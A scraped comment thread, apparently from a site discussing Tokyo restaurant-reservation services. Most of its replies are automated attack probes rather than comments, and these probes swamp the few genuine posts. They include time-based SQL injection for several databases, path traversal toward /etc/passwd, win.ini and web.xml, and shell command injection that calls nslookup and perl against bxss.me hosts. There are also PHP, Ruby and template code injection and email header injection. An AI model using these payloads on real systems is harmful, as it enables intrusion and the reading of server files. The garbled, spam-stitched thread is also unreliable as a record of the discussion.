re: mirugai
1
re: mirugai
1
Thanks for the replies. I suspected the reality was less impressive than the PR.
re: thetokyogourmet
4yW8735v
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
-1 OR 2+272-272-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+272-272-1=0+0+0+1
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
YmD9VZGs'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 426=(SELECT 426 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 162=(SELECT 162 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 108=(SELECT 108 FROM PG_SLEEP(15))--
re: thetokyogourmet
W8ZV9sRO' OR 691=(SELECT 691 FROM PG_SLEEP(15))--
re: thetokyogourmet
qpGtXlPn
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
-1 OR 2+900-900-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+900-900-1=0+0+0+1
re: thetokyogourmet
BQPiKUGM') OR 835=(SELECT 835 FROM PG_SLEEP(15))--
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
RqEq6rqy')) OR 149=(SELECT 149 FROM PG_SLEEP(15))--
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@NO4a6
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
56oVhdtu'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 554=(SELECT 554 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 126=(SELECT 126 FROM PG_SLEEP(15))--
re: thetokyogourmet
Hyj4pUip' OR 511=(SELECT 511 FROM PG_SLEEP(15))--
re: thetokyogourmet
lpK0saFJ') OR 789=(SELECT 789 FROM PG_SLEEP(15))--
re: thetokyogourmet
CwrTGiQV')) OR 766=(SELECT 766 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@f4i8a
re: thetokyogourmet
1D9MhAQEO
re: thetokyogourmet
response.write(9402255*9079911)
re: thetokyogourmet
%0abcc:074625.67-13762.67.b436f.19990.2@bxss.me
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
'+response.write(9402255*9079911)+'
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-13763.67.b436f.19990.2@bxss.me
re: thetokyogourmet
"+response.write(9402255*9079911)+"
re: thetokyogourmet
${9999840+10000311}
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
)
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
'.gethostbyname(lc('hitwl'.'ncgowndr40dd7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(68).chr(112).chr(82).'
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
".gethostbyname(lc("hitfv"."iydgahnebe6a0.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(77).chr(109).chr(82)."
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
echo nluogo$()\ gvfike\nz^xyu||a #' &echo nluogo$()\ gvfike\nz^xyu||a #|" &echo nluogo$()\ gvfike\nz^xyu||a #
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(114).concat(75).concat(116).concat(76)+(require"socket"
Socket.gethostbyname("hitcc"+"ohegohlkba321.bxss.me.")[3].to_s)+"
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
&echo nstvfa$()\ xkzrfw\nz^xyu||a #' &echo nstvfa$()\ xkzrfw\nz^xyu||a #|" &echo nstvfa$()\ xkzrfw\nz^xyu||a #
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(97).concat(75).concat(122).concat(78)+(require'socket'
Socket.gethostbyname('hitht'+'celsobil8d958.bxss.me.')[3].to_s)+'
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
|echo scinwf$()\ umbdqj\nz^xyu||a #' |echo scinwf$()\ umbdqj\nz^xyu||a #|" |echo scinwf$()\ umbdqj\nz^xyu||a #
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
(nslookup hitnggkvpevnq69651.bxss.me||perl -e "gethostbyname('hitnggkvpevnq69651.bxss.me')")
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
'"
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
$(nslookup hitaewqhxeehmdbbaa.bxss.me||perl -e "gethostbyname('hitaewqhxeehmdbbaa.bxss.me')")
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
<!--
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
&nslookup hityamlktnwpw7e504.bxss.me&'\"`0&nslookup hityamlktnwpw7e504.bxss.me&`'
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
&(nslookup hitivgdznofcva6ab4.bxss.me||perl -e "gethostbyname('hitivgdznofcva6ab4.bxss.me')")&'\"`0&(nslookup hitivgdznofcva6ab4.bxss.me||perl -e "gethostbyname('hitivgdznofcva6ab4.bxss.me')")&`'
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
bxss.me
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
|(nslookup hitnhgtoqrmzy4c2e1.bxss.me||perl -e "gethostbyname('hitnhgtoqrmzy4c2e1.bxss.me')")
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
`(nslookup hitqldsncwexs1a7af.bxss.me||perl -e "gethostbyname('hitqldsncwexs1a7af.bxss.me')")`
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
;(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")|(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")&(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+632-632-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+632-632-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+859-859-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+859-859-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+682-682-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+682-682-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+569-569-1=0+0+0+1 or 'eKcLoK1t'='
re: thetokyogourmet
-1' OR 3+569-569-1=0+0+0+1 or 'eKcLoK1t'='
re: thetokyogourmet
-1" OR 2+160-160-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+160-160-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
dPukxIMd'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 720=(SELECT 720 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 160=(SELECT 160 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 730=(SELECT 730 FROM PG_SLEEP(15))--
re: thetokyogourmet
8ah2nDAU' OR 612=(SELECT 612 FROM PG_SLEEP(15))--
re: thetokyogourmet
XchLWGAX') OR 294=(SELECT 294 FROM PG_SLEEP(15))--
re: thetokyogourmet
7EWRXkhw')) OR 292=(SELECT 292 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@Adde2
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1
It just seems like services like Autoreserve, Percotter, etc. have an increasingly limited use case. In recent years, many new joints (frequently run by younger chefs) have started taking reservations online on Tablecheck, Toreta, or even just IG. So companies like Autoreserve aren't needed for those. At the high-end, many well-reviewed restaurants have either partnered with Omakase, Tableall, or require phone-camping at specific times to get seats, so again, a service that calls once every 40mins isn't useful there.
So what we're left with is the awkward middle-ground of restaurants that are under the radar, and run by old-school chefs who don't do online reservations. And only if you're staying at a hotel without a concierge (otherwise your concierge can easily book, since it's under the radar).
re: JJ
xnWJbLTX
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+868-868-1=0+0+0+1
re: JJ
-1 OR 3+868-868-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
uDjhMGWB'; waitfor delay '0:0:15' --
re: JJ
-5 OR 859=(SELECT 859 FROM PG_SLEEP(15))--
re: JJ
bu4z3qok
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+877-877-1=0+0+0+1
re: JJ
-1 OR 3+877-877-1=0+0+0+1
re: JJ
-5) OR 143=(SELECT 143 FROM PG_SLEEP(15))--
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
-1)) OR 621=(SELECT 621 FROM PG_SLEEP(15))--
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
HijFZjsJ' OR 119=(SELECT 119 FROM PG_SLEEP(15))--
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
NHbOJtpx') OR 932=(SELECT 932 FROM PG_SLEEP(15))--
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
kvoGbcIn')) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
1GQCSHak'; waitfor delay '0:0:15' --
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@NfLxw
re: JJ
-5 OR 739=(SELECT 739 FROM PG_SLEEP(15))--
re: JJ
-5) OR 883=(SELECT 883 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 760=(SELECT 760 FROM PG_SLEEP(15))--
re: JJ
Nca27hmV' OR 336=(SELECT 336 FROM PG_SLEEP(15))--
re: JJ
fwdA8O3U') OR 990=(SELECT 990 FROM PG_SLEEP(15))--
re: JJ
qKOtGXg7')) OR 648=(SELECT 648 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@CjL6j
re: JJ
1tLKQqKGO
re: JJ
%0abcc:074625.67-13751.67.24afe.19990.2@bxss.me
re: JJ
response.write(9510767*9054170)
re: JJ
to@example.com>%0d%0abcc:074625.67-13752.67.24afe.19990.2@bxss.me
re: JJ
'+response.write(9510767*9054170)+'
re: JJ
"+response.write(9510767*9054170)+"
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
${9999878+9999998}
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
'.gethostbyname(lc('hitoc'.'pfoagydpdd2d7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(65).chr(110).chr(89).'
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
)
re: JJ
".gethostbyname(lc("hiter"."aqqnwwyy4860d.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(70).chr(102).chr(65)."
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
!(()&&!|*|*|
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
^(#$!@#$)(()))******
re: JJ
/etc/passwd
re: JJ
echo ogintl$()\ wtoepq\nz^xyu||a #' &echo ogintl$()\ wtoepq\nz^xyu||a #|" &echo ogintl$()\ wtoepq\nz^xyu||a #
re: JJ
%2fetc%2fpasswd
re: JJ
&echo rhoucj$()\ hrzlpa\nz^xyu||a #' &echo rhoucj$()\ hrzlpa\nz^xyu||a #|" &echo rhoucj$()\ hrzlpa\nz^xyu||a #
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
|echo sjjuqt$()\ mnxeuz\nz^xyu||a #' |echo sjjuqt$()\ mnxeuz\nz^xyu||a #|" |echo sjjuqt$()\ mnxeuz\nz^xyu||a #
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
(nslookup hitizinnlrcrbd22ef.bxss.me||perl -e "gethostbyname('hitizinnlrcrbd22ef.bxss.me')")
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
